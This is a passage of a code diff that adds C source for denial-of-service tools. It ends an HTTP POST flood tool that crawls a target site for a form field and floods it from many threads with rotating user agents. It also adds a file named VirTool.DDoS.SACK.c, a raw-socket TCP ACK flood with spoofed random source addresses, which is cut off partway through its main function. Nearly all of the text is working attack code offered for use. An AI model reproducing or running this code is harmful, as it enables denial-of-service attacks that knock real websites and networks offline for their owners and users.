+			new_node->data->port = atoi(pch);
+			pch = (char *)strtok(NULL, ":");
+			new_node->data->type = malloc(strlen(pch)+1); strcpy(new_node->data->type, pch);
+			pch = (char *)strtok(NULL, ":");
+			new_node->useragent = useragents[rand() % (sizeof(useragents)/sizeof(char *))];
+			new_node->prev = head;
+			new_node->next = head->next;
+			head->next = new_node;
+		}
+	}
+	free(buffer);
+	const rlim_t kOpenFD = 1024 + (num_threads * 2);
+	struct rlimit rl;
+	int result;
+	rl.rlim_cur = kOpenFD;
+	rl.rlim_max = kOpenFD;
+	result = setrlimit(RLIMIT_NOFILE, &rl);
+	if (result != 0)
+	{
+		perror("setrlimit");
+		fprintf(stderr, "setrlimit returned result = %d\n", result);
+	}
+	char *parameter;
+	if(argc > 7)
+	{
+		parameter = argv[7];
+	} else {
+		parameter = "username";
+	}
+	setupparts();
+	parseURL(argv[1], returnparts);
+	if(argc > 6 && !(strcmp(argv[6], "0") == 0))
+	{
+		ipstr = malloc(strlen(argv[6])+1);
+		strcpy(ipstr, argv[6]);
+		//fprintf(stdout, "Using manual IP...\n");
+	} else {
+		struct hostent *he;
+		struct in_addr a;
+		he = gethostbyname(returnparts[host]->value);
+		if (he)
+		{
+			while (*he->h_addr_list)
+			{
+				bcopy(*he->h_addr_list++, (char *) &a, sizeof(a));
+				ipstr = malloc(INET_ADDRSTRLEN+1);
+				inet_ntop (AF_INET, &a, ipstr, INET_ADDRSTRLEN);
+				break;
+			}
+		}
+		else
+		{ herror("gethostbyname"); }
+	}
+	char *targeturl = argv[1];
+	char *targetparameter = parameter;
+	if(scrapeit == 1)
+	{
+		char *original_domain = malloc(strlen(returnparts[host]->value)+1);
+		strcpy(original_domain, returnparts[host]->value);
+		freeparts();
+		struct urllist *headurl = malloc(sizeof(struct urllist));
+		bzero(headurl, sizeof(struct urllist));
+		headurl->url = argv[1];
+		headurl->done = 0;
+		headurl->next = headurl;
+		headurl->prev = headurl;
+		int donescrape = 0;
+		char *lasturl = "";
+		while(headurl->done == 0)
+		{
+			if(headurl->url == NULL)
+			{
+				headurl->done = 1;
+				headurl = headurl->next;
+				continue;
+			}
+			if(strcmp(headurl->url, lasturl) == 0)
+			{
+				headurl->done = 1;
+				headurl = headurl->next;
+				continue;
+			}
+			lasturl = headurl->url;
+			printf("Scraping: %s\n", headurl->url);
+			char *buffer = geturl(headurl->url, useragents[rand() % (sizeof(useragents)/sizeof(char *))], ipstr);
+			if(strstr(buffer, "\r\n\r\n")==NULL)
+			{
+				free(buffer);
+				headurl->done = 1;
+				headurl = headurl->next;
+				continue;
+			}
+			char *headerstatus = malloc(strstr(buffer, "\r\n\r\n") - buffer + 3);
+			memcpy(headerstatus, buffer, strstr(buffer, "\r\n\r\n") - buffer + 2);
+			char *body = buffer + (strstr(buffer, "\r\n\r\n") - buffer + 2) + 2;
+			int status = atoi(strchr(strncpy(malloc(1024),headerstatus,strstr(headerstatus, "\r\n") - headerstatus), ' ') + 1);
+			char *headers = strstr(headerstatus, "\r\n")+2;
+			int temp = ((status/10)/10) % 10;
+			if(temp == 4)
+			{
+				free(headerstatus);
+				free(buffer);
+				headurl->done = 1;
+				headurl = headurl->next;
+				continue;
+			}
+			if(temp == 3)
+			{
+				char *location = stristr(headers, "Location: ") + 10;
+				if(location == NULL)
+				{
+					free(headerstatus);
+					free(buffer);
+					headurl->done = 1;
+					headurl = headurl->next;
+					continue;
+				}
+				struct urllist *newurl = malloc(sizeof(struct urllist));
+				bzero(newurl, sizeof(struct urllist));
+				char *nexturl = malloc(strstr(location, "\r\n") - location + 1);
+				bzero(nexturl, strstr(location, "\r\n") - location + 1);
+				strncpy(nexturl, location, strstr(location, "\r\n") - location);
+				char *parsednexturl;
+				setupparts();
+				parseURL(nexturl, returnparts);
+				if(!(*(returnparts[path]->value)))
+				{
+					free(headerstatus);
+					free(buffer);
+					headurl->done = 1;
+					headurl = headurl->next;
+					continue;
+				}
+				if(*(returnparts[host]->value))
+				{
+					char *host_tmp = str_replace(returnparts[host]->value, "www.", "");
+					if(host_tmp != NULL)
+					{
+						if(strcmp(host_tmp, original_domain) != 0)
+						{
+							free(headerstatus);
+							free(buffer);
+							headurl->done = 1;
+							headurl = headurl->next;
+							continue;
+						} else {
+							original_domain = malloc(strlen(returnparts[host]->value)+1);
+							bzero(original_domain, strlen(returnparts[host]->value)+1);
+							strcpy(original_domain, returnparts[host]->value);
+						}
+						
+					} else {
+						if(strcmp(returnparts[host]->value, original_domain) != 0)
+						{
+							free(headerstatus);
+							free(buffer);
+							headurl->done = 1;
+							headurl = headurl->next;
+							continue;
+						}
+					}
+					
+					parsednexturl = malloc(strlen(nexturl)+1);
+					bzero(parsednexturl, strlen(nexturl)+1);
+					strcpy(parsednexturl, nexturl);
+				} else {
+					parsednexturl = malloc(7 + strlen(original_domain) + 1 + strlen(returnparts[path]->value) + 1);
+					bzero(parsednexturl, 7 + strlen(original_domain) + 1 + strlen(returnparts[path]->value) + 1);
+					strcpy(parsednexturl, "http://");
+					strcpy(parsednexturl + 7, original_domain);
+					strcpy(parsednexturl + 7 + strlen(original_domain), "/");
+					strcpy(parsednexturl + 7 + strlen(original_domain) + 1, returnparts[path]->value);
+					char *tmp = malloc(strlen(original_domain)+2);
+					bzero(tmp, strlen(original_domain)+2);
+					sprintf(tmp, "%s/", original_domain);
+					char *tmp2 = malloc(strlen(original_domain)+3);
+					bzero(tmp2, strlen(original_domain)+3);
+					sprintf(tmp2, "%s//", original_domain);
+					char *parsednexturl_tmp = str_replace(parsednexturl, tmp2, tmp);
+					if(parsednexturl_tmp != NULL)
+					{
+						free(parsednexturl);
+						parsednexturl = parsednexturl_tmp;
+					}
+					free(tmp);
+					free(tmp2);
+				}
+				freeparts();
+				free(nexturl);
+				
+				newurl->url = parsednexturl;
+				newurl->done = 0;
+				newurl->next = headurl->next;
+				newurl->prev = headurl;
+				headurl->next = newurl;
+				headurl->done = 1;
+				headurl = headurl->next;
+				free(headerstatus);
+				free(buffer);
+				continue;
+			}
+			char *formstart = body;
+			while(stristr(formstart, "<form")!=NULL)
+			{
+				formstart = stristr(formstart, "<form")+5;
+				char *formend = stristr(formstart, "</form");
+				char *input = formstart;
+				char *method = stristr(formstart, "method=");
+				if(method == NULL || method > stristr(formstart, ">"))
+				{
+					continue;
+				}
+				char *methodstart = method+7;
+				char *methodname = NULL;
+				if(strchr(methodstart, '"')!=NULL && strchr(methodstart, '>') > strchr(methodstart, '"'))
+				{
+					methodstart = strchr(method, '"')+1;
+					methodname = malloc(strchr(methodstart, '"') - methodstart + 1);
+					bzero(methodname, strchr(methodstart, '"') - methodstart + 1);
+					strncpy(methodname, methodstart, strchr(methodstart, '"') - methodstart);
+				} else if(strchr(methodstart, '\'')!=NULL && strchr(methodstart, '>') > strchr(methodstart, '\''))
+				{
+					methodstart = strchr(method, '\'')+1;
+					methodname = malloc(strchr(methodstart, '\'') - methodstart + 1);
+					bzero(methodname, strchr(methodstart, '\'') - methodstart + 1);
+					strncpy(methodname, methodstart, strchr(methodstart, '\'') - methodstart);
+				} else {
+					char *end = NULL;
+					if(strchr(methodstart, ' ') > strchr(methodstart, '>'))
+					{
+						end = strchr(methodstart, '>');
+					} else {
+						end = strchr(methodstart, ' ');
+					}
+					methodname = malloc(end - methodstart + 1);
+					bzero(methodname, end - methodstart + 1);
+					strncpy(methodname, methodstart, end - methodstart);
+				}
+				int i;
+				for(i=0;*(methodname + i);i++)
+				{
+					*(methodname + i) = toupper(*(methodname + i));
+				}
+				if(strcmp(methodname, "GET") == 0)
+				{
+					continue;
+				}
+				char *action = stristr(formstart, "action=");
+				char *actionname = NULL;
+				if(action == NULL || action > formend)
+				{
+					actionname = headurl->url;
+				} else {
+					char *actionstart = action;
+					if(strchr(actionstart, '"') != NULL && strchr(actionstart, '>') > strchr(actionstart, '"'))
+					{
+						actionstart = strchr(action, '"')+1;
+						actionname = malloc(strchr(actionstart, '"') - actionstart + 1);
+						bzero(actionname, strchr(actionstart, '"') - actionstart + 1);
+						strncpy(actionname, actionstart, strchr(actionstart, '"') - actionstart);
+					} else if(strchr(actionstart, '\'') != NULL && strchr(actionstart, '>') > strchr(actionstart, '\''))
+					{
+						actionstart = strchr(action, '\'')+1;
+						actionname = malloc(strchr(actionstart, '\'') - actionstart + 1);
+						bzero(actionname, strchr(actionstart, '\'') - actionstart + 1);
+						strncpy(actionname, actionstart, strchr(actionstart, '\'') - actionstart);
+					} else {
+						char *end = NULL;
+						if(strchr(actionstart, ' ') > strchr(actionstart, '>'))
+						{
+							end = strchr(actionstart, '>');
+						} else {
+							end = strchr(actionstart, ' ');
+						}
+						actionname = malloc(end - action + 1);
+						bzero(actionname, end - action + 1);
+						strncpy(actionname, action, end - action);
+					}
+				}
+				if(strcmp(actionname, "") == 0)
+				{
+					free(actionname);
+					actionname = headurl->url;
+				}
+				while((input = stristr(input, "<input")) != NULL)
+				{
+					input = input + 6;
+					char *inputname = stristr(input, "name=");
+					if(inputname != NULL)
+					{
+						inputname = inputname+5;
+						char *namestart = inputname;
+						char *name;
+						if(strchr(inputname, '"')!=NULL && strchr(inputname, '>') > strchr(inputname, '"'))
+						{
+							namestart = strchr(inputname, '"')+1;
+							name = malloc(strchr(namestart, '"') - namestart + 1);
+							bzero(name, strchr(namestart, '"') - namestart + 1);
+							strncpy(name, namestart, strchr(namestart, '"') - namestart);
+						} else if(strchr(inputname, '\'')!=NULL && strchr(inputname, '>') > strchr(inputname, '\''))
+						{
+							namestart = strchr(inputname, '\'')+1;
+							name = malloc(strchr(namestart, '\'') - namestart + 1);
+							bzero(name, strchr(namestart, '\'') - namestart + 1);
+							strncpy(name, namestart, strchr(namestart, '\'') - namestart);
+						} else {
+							char *end = NULL;
+							if(strchr(inputname, ' ') > strchr(inputname, '>'))
+							{
+								end = strchr(inputname, '>');
+							} else {
+								end = strchr(inputname, ' ');
+							}
+							name = malloc(end - inputname + 1);
+							bzero(name, end - inputname + 1);
+							strncpy(name, namestart, end - inputname);
+						}
+						targetparameter = name;
+						setupparts();
+						parseURL(actionname, returnparts);
+						if(!(*(returnparts[path]->value)))
+						{
+							goto NOTRIGHT;
+						}
+						if(*(returnparts[host]->value))
+						{
+							if(strcmp(returnparts[host]->value, original_domain) != 0)
+							{
+								goto NOTRIGHT;
+							}
+							targeturl = actionname;
+						} else {
+							targeturl = malloc(7 + strlen(original_domain) + 1 + strlen(returnparts[path]->value) + 1);
+							bzero(targeturl, 7 + strlen(original_domain) + 1 + strlen(returnparts[path]->value) + 1);
+							strcpy(targeturl, "http://");
+							strcpy(targeturl + 7, original_domain);
+							strcpy(targeturl + 7 + strlen(original_domain), "/");
+							strcpy(targeturl + 7 + strlen(original_domain) + 1, returnparts[path]->value);
+							char *tmp = malloc(strlen(original_domain)+2);
+							bzero(tmp, strlen(original_domain)+2);
+							sprintf(tmp, "%s/", original_domain);
+							char *tmp2 = malloc(strlen(original_domain)+3);
+							bzero(tmp2, strlen(original_domain)+3);
+							sprintf(tmp2, "%s//", original_domain);
+							char *targeturl_tmp = str_replace(targeturl, tmp2, tmp);
+							if(targeturl_tmp != NULL)
+							{
+								free(targeturl);
+								targeturl = targeturl_tmp;
+							}
+							free(tmp);
+							free(tmp2);
+						}
+						freeparts();
+						free(headerstatus);
+						free(buffer);
+						printf("TARGET AQUIRED: %s, %s\n", targeturl, targetparameter);
+						goto END;
+					}
+				}
+NOTRIGHT:
+				continue;
+			}
+			char *link = body;
+			while((link = stristr(link, "<a ")) != NULL)
+			{
+				link = link+3;
+				char *href = stristr(link, "href=");
+				if(href == NULL || href > stristr(link, ">"))
+				{
+					continue;
+				}
+				href = href + 5;
+				char *hrefstart = href;
+				char *hreftarget;
+				if(strchr(hrefstart, '"')!=NULL && strchr(hrefstart, '>') > strchr(hrefstart, '"'))
+				{
+					hrefstart = strchr(hrefstart, '"')+1;
+					hreftarget = malloc(strchr(hrefstart, '"') - hrefstart + 1);
+					bzero(hreftarget, strchr(hrefstart, '"') - hrefstart + 1);
+					strncpy(hreftarget, hrefstart, strchr(hrefstart, '"') - hrefstart);
+				} else if(strchr(hrefstart, '\'')!=NULL && strchr(hrefstart, '>') > strchr(hrefstart, '\''))
+				{
+					hrefstart = strchr(hrefstart, '\'')+1;
+					hreftarget = malloc(strchr(hrefstart, '\'') - hrefstart + 1);
+					bzero(hreftarget, strchr(hrefstart, '\'') - hrefstart + 1);
+					strncpy(hreftarget, hrefstart, strchr(hrefstart, '\'') - hrefstart);
+				} else {
+					char *end = NULL;
+					if(strchr(hrefstart, ' ') > strchr(hrefstart, '>'))
+					{
+						end = strchr(hrefstart, '>');
+					} else {
+						end = strchr(hrefstart, ' ');
+					}
+					hreftarget = malloc(end - hrefstart + 1);
+					bzero(hreftarget, end - hrefstart + 1);
+					strncpy(hreftarget, hrefstart, end - hrefstart);
+				}
+				if(strcmp(hreftarget, "#") == 0 || stristr(hreftarget, "javascript:") != NULL)
+				{
+					free(hreftarget);
+					continue;
+				}
+				char *scrapenext;
+				setupparts();
+				parseURL(hreftarget, returnparts);
+				if(!(*(returnparts[path]->value)))
+				{
+					freeparts();
+					continue;
+				}
+				if(*(returnparts[host]->value))
+				{
+					if(strcmp(returnparts[host]->value, original_domain) != 0)
+					{
+						freeparts();
+						continue;
+					}
+					scrapenext = hreftarget;
+				} else {
+					scrapenext = malloc(7 + strlen(original_domain) + 1 + strlen(returnparts[path]->value) + 1);
+					bzero(scrapenext, 7 + strlen(original_domain) + 1 + strlen(returnparts[path]->value) + 1);
+					strcpy(scrapenext, "http://");
+					strcpy(scrapenext + 7, original_domain);
+					strcpy(scrapenext + 7 + strlen(original_domain), "/");
+					strcpy(scrapenext + 7 + strlen(original_domain) + 1, returnparts[path]->value);
+					char *tmp = malloc(strlen(original_domain)+2);
+					bzero(tmp, strlen(original_domain)+2);
+					sprintf(tmp, "%s/", original_domain);
+					char *tmp2 = malloc(strlen(original_domain)+3);
+					bzero(tmp2, strlen(original_domain)+3);
+					sprintf(tmp2, "%s//", original_domain);
+					char *scrapenext_tmp = str_replace(scrapenext, tmp2, tmp);
+					if(scrapenext_tmp != NULL)
+					{
+						free(scrapenext);
+						scrapenext = scrapenext_tmp;
+					}
+					free(tmp);
+					free(tmp2);
+				}
+				freeparts();
+				int alreadyadded = 0;
+				if(headurl->next == headurl)
+				{
+					if(strcmp(headurl->url, scrapenext) == 0)
+					{
+						alreadyadded = 1;
+					}
+				} else {
+					struct urllist *dup = headurl->next;
+					while(dup != headurl)
+					{
+						if(dup->url == NULL)
+						{
+							dup->prev->next = dup->next;
+							dup->next->prev = dup->prev;
+							dup = dup->next;
+							continue;
+						}
+						if(strcmp(dup->url, scrapenext) == 0)
+						{
+							alreadyadded = 1;
+							break;
+						}
+						dup = dup->next;
+					}
+				}
+				if(alreadyadded == 0)
+				{
+					struct urllist *newurl = malloc(sizeof(struct urllist));
+					bzero(newurl, sizeof(struct urllist));
+					newurl->url = scrapenext;
+					newurl->done = 0;
+					newurl->next = headurl->next;
+					newurl->prev = headurl;
+					headurl->next = newurl;
+				}
+			}
+			headurl->done = 1;
+			headurl = headurl->next;
+			free(headerstatus);
+			free(buffer);
+		}
+END:
+		free(original_domain);
+	} else {
+		freeparts();
+	}
+	setupparts();
+	parseURL(targeturl, returnparts);
+	pthread_t thread[num_threads];
+	struct list *td[num_threads];
+	struct list *node = head->next;
+	
+	
+	for(i=0;i<num_threads;i++)
+	{
+		td[i] = node;
+		node = node->next;
+	}
+	postpayload = malloc(4096);
+	sprintf(postpayload, postformat, returnparts[path]->value, returnparts[host]->value, targetparameter);
+	freeparts();
+	
+	//fprintf(stdout, "Starting Flood...\n");
+	
+	fnAttackInformation(atoi(argv[argc-1]));
+	
+	for(i = 0;i<num_threads;i++){
+		pthread_create( &thread[i], NULL, &flood, (void *) td[i]);
+	}
+	sleep(atoi(argv[5]));
+	return 0;
+}
+char *geturl(char *url, char *useragent, char *ip)
+{
+RETRY:
+	setupparts();
+	parseURL(url, returnparts);
+	struct sockaddr_in serverAddr;
+	bzero(&serverAddr, sizeof(serverAddr));
+	serverAddr.sin_family = AF_INET;
+	serverAddr.sin_port = htons(ATTACKPORT);
+	serverAddr.sin_addr.s_addr = inet_addr(ip);
+	int serverSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
+	unsigned int yes = 1;
+	setsockopt(serverSocket,SOL_SOCKET,SO_REUSEADDR,&yes,sizeof(yes));
+	if(connect(serverSocket, (struct sockaddr *)&serverAddr, sizeof(serverAddr)) > 0)
+	{
+		printf("GETURL CONNECT FAILED, RETRYING\n");
+		close(serverSocket);
+		freeparts();
+		goto RETRY;
+	}
+	int bytes = 0;
+	char *payload = malloc(8094);
+	bzero(payload, 8094);
+	sprintf(payload, "GET /%s HTTP/1.0\r\nHost: %s\r\nConnection: close\r\nUser-Agent: %s\r\n\r\n", returnparts[path]->value, returnparts[host]->value, useragent);
+	freeparts();
+	bytes = send(serverSocket, payload, strlen(payload), MSG_NOSIGNAL);
+	if(bytes == -1)
+	{
+		printf("GETURL SEND FAILED, SITE CLOSED CONNECTION, RETRYING\n");
+		close(serverSocket);
+		goto RETRY;
+	}
+	int total = 0;
+	int currentsize = 4096;
+	char *buffer = malloc(4096);
+	bzero(buffer, 4096);
+	bytes = recv(serverSocket, buffer, 4096, 0);
+	while(bytes > 0)
+	{
+		total += bytes;
+		if(total+4096 > currentsize)
+		{
+			char *new_buffer = malloc(total+4096);
+			bzero(new_buffer, total+4096);
+			memcpy(new_buffer, buffer, total);
+			free(buffer);
+			buffer = new_buffer;
+			currentsize = total+4096;
+		}
+		bytes = recv(serverSocket, buffer+total, 4096, 0);
+	}
+	return buffer;
+}
+void freeparts()
+{
+	return;
+	if(returnparts[0]!=NULL) { free(returnparts[0]); }
+	if(returnparts[1]!=NULL) { free(returnparts[1]); }
+	if(returnparts[2]!=NULL) { free(returnparts[2]); }
+	if(returnparts[3]!=NULL) { free(returnparts[3]); }
+	if(returnparts[4]!=NULL) { free(returnparts[4]); }
+	if(returnparts[5]!=NULL) { free(returnparts[5]); }
+	if(returnparts[6]!=NULL) { free(returnparts[6]); }
+	if(returnparts[7]!=NULL) { free(returnparts[7]); }
+	if(returnparts[8]!=NULL) { free(returnparts[8]); }
+	return;
+}
+void setupparts()
+{
+	returnparts[0] = malloc(sizeof(struct urlparts));
+	returnparts[1] = malloc(sizeof(struct urlparts));
+	returnparts[2] = malloc(sizeof(struct urlparts));
+	returnparts[3] = malloc(sizeof(struct urlparts));
+	returnparts[4] = malloc(sizeof(struct urlparts));
+	returnparts[5] = malloc(sizeof(struct urlparts));
+	returnparts[6] = malloc(sizeof(struct urlparts));
+	returnparts[7] = malloc(sizeof(struct urlparts));
+	returnparts[8] = malloc(sizeof(struct urlparts));
+	bzero(returnparts[0], sizeof(struct urlparts));
+	bzero(returnparts[1], sizeof(struct urlparts));
+	bzero(returnparts[2], sizeof(struct urlparts));
+	bzero(returnparts[3], sizeof(struct urlparts));
+	bzero(returnparts[4], sizeof(struct urlparts));
+	bzero(returnparts[5], sizeof(struct urlparts));
+	bzero(returnparts[6], sizeof(struct urlparts));
+	bzero(returnparts[7], sizeof(struct urlparts));
+	bzero(returnparts[8], sizeof(struct urlparts));
+	returnparts[0]->name = "scheme";
+	strcpy(returnparts[0]->separator, ":");
+	returnparts[1]->name = "userid";
+	strcpy(returnparts[1]->separator, "@");
+	returnparts[2]->name = "password";
+	strcpy(returnparts[2]->separator, ":");
+	returnparts[3]->name = "host";
+	strcpy(returnparts[3]->separator, "//");
+	returnparts[4]->name = "port";
+	strcpy(returnparts[4]->separator, ":");
+	returnparts[5]->name = "path";
+	strcpy(returnparts[5]->separator, "/");
+	returnparts[6]->name = "param";
+	strcpy(returnparts[6]->separator, ";");
+	returnparts[7]->name = "query";
+	strcpy(returnparts[7]->separator, "?");
+	returnparts[8]->name = "fragment";
+	strcpy(returnparts[8]->separator, "#");
+	return;
+}
+int parseURL(char *url, struct urlparts **returnpart) {
+	register i;
+	int seplen;
+	char * remainder;
+	char * regall = ":/;?#";
+	char * regpath = ":;?#";
+	char * regx;
+	if(!*url)
+	{
+		strcpy(parseError, "nothing to do!\n");
+		return 0;
+	}
+	if((remainder = malloc(strlen(url) + 1)) == NULL)
+	{
+		printf("cannot allocate memory\n");
+		exit(-1);
+	}
+	strcpy(remainder, url);
+	if(firstpunc(remainder) == ':')
+	{
+		strcpy(returnpart[scheme]->value, strsplit(remainder, returnpart[scheme]->separator));
+		strleft(remainder, 1);
+	}
+	if (!strcmp(returnpart[scheme]->value, "mailto"))
+	*(returnpart[host]->separator) = 0;
+	for(i = 0; i < NUMPARTS; i++)
+	{
+		if(!*remainder)
+		break;
+		if(i == scheme || i == userid || i == password)
+		continue;
+		if(i == host && strchr(remainder, '@'))
+		{
+			if(!strncmp(remainder, "//", 2))
+			strleft(remainder, 2);
+			strcpy(returnpart[userid]->value, strsplit(remainder, ":@"));
+			strleft(remainder, 1);
+			if(strchr(remainder, '@'))
+			{
+				strcpy(returnpart[password]->value, strsplit(remainder, "@"));
+				strleft(remainder, 1);
+			}
+			*(returnpart[host]->separator) = 0;
+		}
+		if(i == path && (! *(returnpart[scheme]->value)))
+		{
+			*(returnpart[path]->separator) = 0;
+			strcpy(returnpart[scheme]->value, "http");
+		}
+		regx = (i == path) ? regpath : regall ;
+		seplen = strlen(returnpart[i]->separator);
+		if(strncmp(remainder, returnpart[i]->separator, seplen))
+		continue;
+		else
+		strleft(remainder, seplen);
+		strcpy(returnpart[i]->value, strsplit(remainder, regx));
+	}
+	if(*remainder)
+	sprintf(parseError, "I don't understand '%s'", remainder);
+	free(remainder);
+	return 0;
+}
+char *str_replace(char *orig, char *rep, char *with) {
+	char *result; 
+	char *ins;    
+	char *tmp;    
+	int len_rep;  
+	int len_with; 
+	int len_front; 
+	int count;    
+	if (!orig)
+	return NULL;
+	if (!rep || !(len_rep = strlen(rep)))
+	return NULL;
+	if (!(ins = strstr(orig, rep)))
+	return NULL;
+	if (!with)
+	with = "";
+	len_with = strlen(with);
+	for (count = 0; tmp = strstr(ins, rep); ++count) {
+		ins = tmp + len_rep;
+	}
+	tmp = result = malloc(strlen(orig) + (len_with - len_rep) * count + 1);
+	if (!result)
+	return NULL;
+	while (count--) {
+		ins = strstr(orig, rep);
+		len_front = ins - orig;
+		tmp = strncpy(tmp, orig, len_front) + len_front;
+		tmp = strcpy(tmp, with) + len_with;
+		orig += len_front + len_rep; 
+	}
+	strcpy(tmp, orig);
+	return result;
+}
+char *stristr(const char *String, const char *Pattern)
+{
+	char *pptr, *sptr, *start;
+	uint slen, plen;
+	for (start = (char *)String,
+	pptr = (char *)Pattern,
+	slen = strlen(String),
+	plen = strlen(Pattern);
+	slen >= plen;
+	start++, slen--)
+	{
+		
+		while (toupper(*start) != toupper(*Pattern))
+		{
+			start++;
+			slen--;
+			
+			if (slen < plen)
+			return(NULL);
+		}
+		sptr = start;
+		pptr = (char *)Pattern;
+		while (toupper(*sptr) == toupper(*pptr))
+		{
+			sptr++;
+			pptr++;
+			
+			if ('\0' == *pptr)
+			return (start);
+		}
+	}
+	return(NULL);
+}
+char * strsplit(char * s, char * tok) {
+#define OUTLEN (255)
+	register i, j;
+	static char out[OUTLEN + 1];
+	for(i = 0; s[i] && i < OUTLEN; i++)
+	{
+		if(strchr(tok, s[i]))
+		break;
+		else
+		out[i] = s[i];
+	}
+	out[i] = 0;
+	if(i && s[i])
+	{
+		for(j = 0; s[i]; i++, j++) s[j] = s[i];
+		s[j] = 0;
+	}
+	else if (!s[i])
+	*s = 0;
+	return out;
+}
+char firstpunc(char * s) {
+	while(*s++)
+	if(!isalnum(*s)) return *s;
+	return 0;
+}
+int strleft(char * s, int n) {
+	int l;
+	l = strlen(s);
+	if(l < n)
+	return -1;
+	else if (l == n)
+	*s = 0;
+	memmove(s, s + n, l - n + 1);
+	return n;
+}
\ No newline at end of file
diff --git a/libs/VirTool.DDoS.SACK.c b/libs/VirTool.DDoS.SACK.c
new file mode 100644
index 00000000..575d431c
--- /dev/null
+++ b/libs/VirTool.DDoS.SACK.c
@@ -0,0 +1,216 @@
+/*
+ * This is released under the GNU GPL License v3.0, and is allowed to be used for commercial products ;)
+ */
+#include <unistd.h>
+#include <time.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <sys/ioctl.h>
+#include <string.h>
+#include <stdlib.h>
+#include <stdio.h>
+#include <pthread.h>
+#include <netinet/tcp.h>
+#include <netinet/ip.h>
+#include <netinet/in.h>
+#include <netinet/if_ether.h>
+#include <netdb.h>
+#include <net/if.h>
+#include <arpa/inet.h>
+
+#define MAX_PACKET_SIZE 65534
+#define PHI 0x9e3779b9
+
+static unsigned long int Q[4096], c = 362436;
+volatile int limiter;
+volatile unsigned int pps;
+volatile unsigned int sleeptime = 100;
+
+void init_rand(unsigned long int x)
+{
+	int i;
+	Q[0] = x;
+	Q[1] = x + PHI;
+	Q[2] = x + PHI + PHI;
+	for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
+}
+unsigned long int rand_cmwc(void)
+{
+	unsigned long long int t, a = 18782LL;
+	static unsigned long int i = 4095;
+	unsigned long int x, r = 0xfffffffe;
+	i = (i + 1) & 4095;
+	t = a * Q[i] + c;
+	c = (t >> 32);
+	x = t + c;
+	if (x < c) {
+		x++;
+		c++;
+	}
+	return (Q[i] = r - x);
+}
+unsigned short csum (unsigned short *buf, int count)
+{
+	register unsigned long sum = 0;
+	while( count > 1 ) { sum += *buf++; count -= 2; }
+	if(count > 0) { sum += *(unsigned char *)buf; }
+	while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
+	return (unsigned short)(~sum);
+}
+
+unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
+
+	struct tcp_pseudo
+	{
+		unsigned long src_addr;
+		unsigned long dst_addr;
+		unsigned char zero;
+		unsigned char proto;
+		unsigned short length;
+	} pseudohead;
+	unsigned short total_len = iph->tot_len;
+	pseudohead.src_addr=iph->saddr;
+	pseudohead.dst_addr=iph->daddr;
+	pseudohead.zero=0;
+	pseudohead.proto=IPPROTO_TCP;
+	pseudohead.length=htons(sizeof(struct tcphdr));
+	int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
+	unsigned short *tcp = malloc(totaltcp_len);
+	memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
+	memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
+	unsigned short output = csum(tcp,totaltcp_len);
+	free(tcp);
+	return output;
+}
+
+void setup_ip_header(struct iphdr *iph)
+{
+	iph->ihl = 5;
+	iph->version = 4;
+	iph->tos = 0;
+	iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
+	iph->id = htonl(54321);
+	iph->frag_off = 0;
+	iph->ttl = MAXTTL;
+	iph->protocol = 6;
+	iph->check = 0;
+	iph->saddr = inet_addr("192.168.3.100");
+}
+
+void setup_tcp_header(struct tcphdr *tcph)
+{
+	tcph->source = rand();
+	tcph->seq = rand();
+	tcph->ack_seq = rand();
+	tcph->res2 = 0;
+	tcph->doff = 5;
+	tcph->ack = 1;
+	tcph->window = htons(65535);
+	tcph->check = 0;
+	tcph->urg_ptr = 0;
+}
+
+void *flood(void *par1)
+{
+	char *td = (char *)par1;
+	char datagram[MAX_PACKET_SIZE];
+	struct iphdr *iph = (struct iphdr *)datagram;
+	struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
+	
+	struct sockaddr_in sin;
+	sin.sin_family = AF_INET;
+	sin.sin_port = rand();
+	sin.sin_addr.s_addr = inet_addr(td);
+
+	int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
+	if(s < 0){
+		fprintf(stderr, "Could not open raw socket.\n");
+		exit(-1);
+	}
+	memset(datagram, 0, MAX_PACKET_SIZE);
+	setup_ip_header(iph);
+	setup_tcp_header(tcph);
+
+	tcph->dest = rand();
+
+	iph->daddr = sin.sin_addr.s_addr;
+	iph->check = csum ((unsigned short *) datagram, iph->tot_len);
+
+	int tmp = 1;
+	const int *val = &tmp;
+	if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
+		fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
+		exit(-1);
+	}
+
+	init_rand(time(NULL));
+	register unsigned int i;
+	i = 0;
+	while(1){
+		sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
+
+		iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
+		iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
+		iph->check = csum ((unsigned short *) datagram, iph->tot_len);
+		tcph->seq = rand_cmwc() & 0xFFFF;
+		tcph->source = htons(rand_cmwc() & 0xFFFF);
+		tcph->check = 0;
+		tcph->check = tcpcsum(iph, tcph);
+		
+		pps++;
+		if(i >= limiter)
+		{
+			i = 0;
+			usleep(sleeptime);
+		}
+		i++;
+	}
+}
+int main(int argc, char *argv[ ])
+{
+	if(argc < 5){
+		fprintf(stderr, "Improper ACK flood parameters!\n");
+		fprintf(stdout, "Usage: %s <target IP> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
+		exit(-1);
+	}
+
+	fprintf(stdout, "Setting up Sockets...\n");
+
+	int num_threads = atoi(argv[2]);
+	int maxpps = atoi(argv[3]);
+	limiter = 0;
+	pps = 0;
+	pthread_t thread[num_threads];
+	
+	int multiplier = 100;
+
+	int i;
